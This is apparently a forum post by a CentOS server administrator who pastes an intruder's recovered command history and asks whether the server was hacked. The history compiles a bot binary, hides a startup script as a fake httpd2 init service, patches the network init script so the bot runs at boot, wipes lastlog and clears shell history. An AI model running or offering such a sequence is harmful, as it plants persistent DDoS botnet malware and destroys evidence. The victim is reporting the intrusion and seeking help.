We logged remotely into our CentOS server today using Putty, and while wandering through previous commands using the up arrow, stumbled across the following:
mkdir /usr/lib/tmp
cd /usr/lib/tmp
wget -o /dev/null
wget -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh > /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &
(&&'s replaced with newlines for clarity)
I never ran these commands, EVER! How did this happen, is my server being hacked? I immediately changed my root password, but was hoping someone could make heads or tails of what's happening over here.
I see references made in the source to ddos bots, and me and my colleague are seriously concerned!
Thanks in advance!